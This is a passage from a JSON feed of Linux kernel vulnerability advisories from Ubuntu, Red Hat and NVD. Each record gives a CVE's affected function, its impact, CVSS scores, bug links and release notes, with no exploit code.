6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7515"], "modified": "2016-04-27T00:00:00", "id": "UB:CVE-2015-7515", "href": "https://ubuntu.com/security/CVE-2015-7515", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-05-26T14:37:34", "description": "Array index error in the kvm_vm_ioctl_create_vcpu function in\nvirt/kvm/kvm_main.c in the KVM subsystem in the Linux kernel through 3.12.5\nallows local users to gain privileges via a large id value.\n\n#### Bugs\n\n * <https://launchpad.net/bugs/1261564>\n", "cvss3": {}, "published": "2013-12-14T00:00:00", "type": "ubuntucve", "title": "CVE-2013-4587", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-4587"], "modified": "2013-12-14T00:00:00", "id": "UB:CVE-2013-4587", "href": "https://ubuntu.com/security/CVE-2013-4587", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:13:40", "description": "The __switch_to function in arch/x86/kernel/process_64.c in the Linux\nkernel through 3.18.1 does not ensure that Thread Local Storage (TLS)\ndescriptors are loaded before proceeding with other steps, which makes it\neasier for local users to bypass the ASLR protection mechanism via a\ncrafted application that reads a TLS base address.\n\n#### Bugs\n\n * <https://launchpad.net/bugs/1407945>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | android kernels (flo, goldfish, grouper, maguro, mako and manta) are not supported on the Ubuntu Touch 14.04 preview kernels linux-lts-saucy no longer receives official support linux-lts-quantal no longer receives official support\n", "cvss3": {}, "published": "2014-12-25T00:00:00", "type": "ubuntucve", "title": "CVE-2014-9419", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9419"], "modified": "2014-12-25T00:00:00", "id": "UB:CVE-2014-9419", "href": "https://ubuntu.com/security/CVE-2014-9419", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-05-27T14:09:12", "description": "The sco_sock_bind function in net/bluetooth/sco.c in the Linux kernel\nbefore 4.3.4 does not verify an address length, which allows local users to\nobtain sensitive information from kernel memory and bypass the KASLR\nprotection mechanism via a crafted application.\n\n#### Bugs\n\n * <https://launchpad.net/bugs/1530407>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | android kernels (flo, goldfish, grouper, maguro, mako and manta) are not supported on the Ubuntu Touch 14.10 and earlier preview kernels linux-lts-saucy no longer receives official support linux-lts-quantal no longer receives official support\n", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 4.0, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2015-12-17T00:00:00", "type": "ubuntucve", "title": "CVE-2015-8575", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-8575"], "modified": "2015-12-17T00:00:00", "id": "UB:CVE-2015-8575", "href": "https://ubuntu.com/security/CVE-2015-8575", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-05-27T14:03:09", "description": "Race condition in the snd_pcm_period_elapsed function in\nsound/core/pcm_lib.c in the ALSA subsystem in the Linux kernel before 4.7\nallows local users to cause a denial of service (use-after-free) or\npossibly have unspecified other impact via a crafted\nSNDRV_PCM_TRIGGER_START command.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | android kernels (flo, goldfish, grouper, maguro, mako and manta) are not supported on the Ubuntu Touch 14.10 and earlier preview kernels linux-lts-saucy no longer receives official support linux-lts-quantal no longer receives official support\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-12-28T00:00:00", "type": "ubuntucve", "title": "CVE-2016-9794", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9794"], "modified": "2016-12-28T00:00:00", "id": "UB:CVE-2016-9794", "href": "https://ubuntu.com/security/CVE-2016-9794", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:06:13", "description": "The tipc_nl_compat_link_dump function in net/tipc/netlink_compat.c in the\nLinux kernel through 4.6.3 does not properly copy a certain string, which\nallows local users to obtain sensitive information from kernel stack memory\nby reading a Netlink message.\n\n#### Bugs\n\n * <https://launchpad.net/bugs/1589036>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | android kernels (flo, goldfish, grouper, maguro, mako and manta) are not supported on the Ubuntu Touch 14.10 and earlier preview kernels linux-lts-saucy no longer receives official support linux-lts-quantal no longer receives official support\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-06-27T00:00:00", "type": "ubuntucve", "title": "CVE-2016-5243", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5243"], "modified": "2016-06-27T00:00:00", "id": "UB:CVE-2016-5243", "href": "https://ubuntu.com/security/CVE-2016-5243", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-05-27T14:15:31", "description": "The snd_ctl_elem_add function in sound/core/control.c in the ALSA control\nimplementation in the Linux kernel before 3.15.2 does not properly maintain\nthe user_ctl_count value, which allows local users to cause a denial of\nservice (integer overflow and limit bypass) by leveraging\n/dev/snd/controlCX access for a large number of\nSNDRV_CTL_IOCTL_ELEM_REPLACE ioctl calls.\n\n#### Bugs\n\n * <https://launchpad.net/bugs/1339304>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | android kernels (goldfish, grouper, maguro, mako and manta) are not supported on the Ubuntu Touch 13.10 preview kernels android kernels (flo, goldfish, grouper, maguro, mako and manta) are not supported on the Ubuntu Touch 14.04 preview kernels linux-lts-saucy no longer receives official support linux-lts-quantal no longer receives official support\n", "cvss3": {}, "published": "2014-07-03T00:00:00", "type": "ubuntucve", "title": "CVE-2014-4655", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4655"], "modified": "2014-07-03T00:00:00", "id": "UB:CVE-2014-4655", "href": "https://ubuntu.com/security/CVE-2014-4655", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-05-27T14:06:40", "description": "sound/core/timer.c in the Linux kernel through 4.6 does not initialize\ncertain r1 data structures, which allows local users to obtain sensitive\ninformation from kernel stack memory via crafted use of the ALSA timer\ninterface, related to the (1) snd_timer_user_ccallback and (2)\nsnd_timer_user_tinterrupt functions.\n\n#### Bugs\n\n * <https://launchpad.net/bugs/1581866>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | android kernels (flo, goldfish, grouper, maguro, mako and manta) are not supported on the Ubuntu Touch 14.10 and earlier preview kernels linux-lts-saucy no longer receives official support linux-lts-quantal no longer receives official support\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-05-23T00:00:00", "type": "ubuntucve", "title": "CVE-2016-4578", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4578"], "modified": "2016-05-23T00:00:00", "id": "UB:CVE-2016-4578", "href": "https://ubuntu.com/security/CVE-2016-4578", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-05-27T14:12:38", "description": "Race condition in the handle_to_path function in fs/fhandle.c in the Linux\nkernel through 3.19.1 allows local users to bypass intended size\nrestrictions and trigger read operations on additional memory locations by\nchanging the handle_bytes value of a file handle during the execution of\nthis function.\n\n#### Bugs\n\n * <https://launchpad.net/bugs/1416503>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | android kernels (flo, goldfish, grouper, maguro, mako and manta) are not supported on the Ubuntu Touch 14.04 preview kernels linux-lts-saucy no longer receives official support linux-lts-quantal no longer receives official support\n", "cvss3": {}, "published": "2015-03-16T00:00:00", "type": "ubuntucve", "title": "CVE-2015-1420", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 1.9, "vectorString": "AV:L/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1420"], "modified": "2015-03-16T00:00:00", "id": "UB:CVE-2015-1420", "href": "https://ubuntu.com/security/CVE-2015-1420", "cvss": {"score": 1.9, "vector": "AV:L/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-05-27T14:14:48", "description": "The assoc_array_gc function in the associative-array implementation in\nlib/assoc_array.c in the Linux kernel before 3.16.3 does not properly\nimplement garbage collection, which allows local users to cause a denial of\nservice (NULL pointer dereference and system crash) or possibly have\nunspecified other impact via multiple \"keyctl newring\" operations followed\nby a \"keyctl timeout\" operation.\n\n#### Bugs\n\n * <https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2014-3631>\n * <https://launchpad.net/bugs/1370041>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | android kernels (flo, goldfish, grouper, maguro, mako and manta) are not supported on the Ubuntu Touch 14.04 preview kernels linux-lts-saucy no longer receives official support linux-lts-quantal no longer receives official support\n", "cvss3": {}, "published": "2014-09-28T00:00:00", "type": "ubuntucve", "title": "CVE-2014-3631", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3631"], "modified": "2014-09-28T00:00:00", "id": "UB:CVE-2014-3631", "href": "https://ubuntu.com/security/CVE-2014-3631", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T13:58:19", "description": "An issue was discovered in the size of the stack guard page on Linux,\nspecifically a 4k stack guard page is not sufficiently large and can be\n\"jumped\" over (the stack guard page is bypassed), this affects Linux Kernel\nversions 4.11.5 and earlier (the stackguard page was introduced in 2010).\n\n#### Bugs\n\n * <https://launchpad.net/bugs/1698919>\n * <https://bugs.launchpad.net/ubuntu/+source/linux/+bug/1699772>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[sbeattie](<https://launchpad.net/~sbeattie>) | introduced regression around java threaded apps, see #1699772 a temporary workaround for java applications is to set JAVA_TOOL_OPTIONS=-Xss1280k\n", "cvss3": {"exploitabilityScore": 1.4, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.4, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-06-19T00:00:00", "type": "ubuntucve", "title": "CVE-2017-1000364", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 1.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.2, "vectorString": "AV:L/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000364"], "modified": "2017-06-19T00:00:00", "id": "UB:CVE-2017-1000364", "href": "https://ubuntu.com/security/CVE-2017-1000364", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}], "redhatcve": [{"lastseen": "2023-05-27T14:38:55", "description": "An issue was discovered in the Linux kernel in the F2FS filesystem code. A NULL pointer dereference in fscrypt_do_page_crypto() in the fs/crypto/crypto.c function can occur when operating on a file on a corrupted f2fs image.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2020-03-27T02:01:33", "type": "redhatcve", "title": "CVE-2018-14616", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.1, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-14616"], "modified": "2023-04-06T04:28:44", "id": "RH:CVE-2018-14616", "href": "https://access.redhat.com/security/cve/cve-2018-14616", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-09-02T22:51:08", "description": "The LLC subsystem in the Linux kernel does not ensure that a certain destructor exists in required circumstances, which allows local users to cause a denial of service (BUG_ON) or possibly have unspecified other impact via crafted system calls.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-03-02T16:48:19", "type": "redhatcve", "title": "CVE-2017-6345", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6345"], "modified": "2020-04-08T20:23:32", "id": "RH:CVE-2017-6345", "href": "https://access.redhat.com/security/cve/cve-2017-6345", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-09T13:50:15", "description": "A leak of information was possible when issuing a netlink command of the stack memory area leading up to this function call. An attacker could use this to determine stack information for use in a later exploit.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-06-07T07:48:41", "type": "redhatcve", "title": "CVE-2016-5243", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5243"], "modified": "2020-04-08T22:12:22", "id": "RH:CVE-2016-5243", "href": "https://access.redhat.com/security/cve/cve-2016-5243", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-06-25T02:40:16", "description": "A vulnerability was found in Linux kernel. There is an information leak in file sound/core/timer.c of the latest mainline Linux kernel. The stack object \u201cr1\u201d has a total size of 32 bytes. Its field \u201cevent\u201d and \u201cval\u201d both contain 4 bytes padding. These 8 bytes padding bytes are sent to user without being initialized.\n", "cvss3": {}, "published": "2016-12-15T20:21:12", "type": "redhatcve", "title": "CVE-2016-4578", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2016-4578"], "modified": "2020-08-21T18:49:21", "id": "RH:CVE-2016-4578", "href": "https://access.redhat.com/security/cve/cve-2016-4578", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}], "cve": [{"lastseen": "2023-05-27T14:33:58", "description": "An issue was discovered in the Linux kernel through 4.17.10. There is a NULL pointer dereference in fscrypt_do_page_crypto() in fs/crypto/crypto.c when operating on a file in a corrupted f2fs image.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2018-07-27T04:29:00", "type": "cve", "title": "CVE-2018-14616", "cwe": ["CWE-476"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.1, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-14616"], "modified": "2019-04-03T01:29:00", "cpe": ["cpe:/o:linux:linux_kernel:4.17.10"], "id": "CVE-2018-14616", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-14616", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.17.10:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:20:20", "description": "The nfnetlink_rcv_batch function in net/netfilter/nfnetlink.c in the Linux kernel before 4.5 does not check whether a batch message's length field is large enough, which allows local users to obtain sensitive information from kernel memory or cause a denial of service (infinite loop or out-of-bounds read) by leveraging the CAP_NET_ADMIN capability.", "cvss3": {"exploitabilityScore": 1.3, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.0, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2016-11-16T05:59:00", "type": "cve", "title": "CVE-2016-7917", "cwe": ["CWE-125", "CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7917"], "modified": "2016-12-02T23:13:00", "cpe": ["cpe:/o:linux:linux_kernel:4.4.32"], "id": "CVE-2016-7917", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7917", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.4.32:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-28T02:26:13", "description": "The __ext4_journal_stop function in fs/ext4/ext4_jbd2.c in the Linux kernel before 4.3.3 allows local users to gain privileges or cause a denial of service (use-after-free) by leveraging improper access to a certain error field.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-11-16T05:59:00", "type": "cve", "title": "CVE-2015-8961", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-8961"], "modified": "2023-01-19T16:05:00", "cpe": [], "id": "CVE-2015-8961", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-8961", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2023-05-27T14:14:25", "description": "drivers/soc/qcom/qdsp6v2/voice_svc.c in the QDSP6v2 Voice Service driver for the Linux kernel 3.x, as used in Qualcomm Innovation Center (QuIC) Android contributions for MSM devices and other products, allows attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via a write request, as demonstrated by a voice_svc_send_req buffer overflow.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-10-10T10:59:00", "type": "cve", "title": "CVE-2016-5343", "cwe": ["CWE-120"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-5343"], "modified": "2020-08-03T16:24:00", "cpe": ["cpe:/o:linux:linux_kernel:3.19.8"], "id": "CVE-2016-5343", "href": 